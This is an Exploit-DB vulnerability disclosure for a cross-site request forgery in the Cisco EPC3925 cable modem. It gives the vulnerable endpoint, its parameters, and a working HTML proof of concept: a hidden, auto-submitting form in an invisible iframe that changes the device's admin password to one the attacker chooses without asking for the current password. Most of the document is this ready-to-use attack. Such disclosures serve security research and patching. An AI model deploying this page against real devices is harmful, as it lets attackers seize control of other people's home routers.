Cisco EPC3925 - Cross-Site Request Forgery

EDB-ID:

30362




Platform:

Hardware

Date:

2013-12-16


#######################################################################
# Exploit Title: Cisco EPC3925 � Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com 
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925 
# CVE: N/A
#######################################################################
# Description:
# 
# This proof of concept demonstrates that the admin password can be 
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#            
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC: 
#
# <html>
#
# <form name="reseller" method="POST"
action="http://[target]/goform/Quick_setup" id="csrf_attack"
target="csrf_iframe">
#   <input type="hidden" name="Password" value="attackers_password">
#   <input type="hidden" name="PasswordReEnter" value="attackers_password">
#   <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
#  document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html> 
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/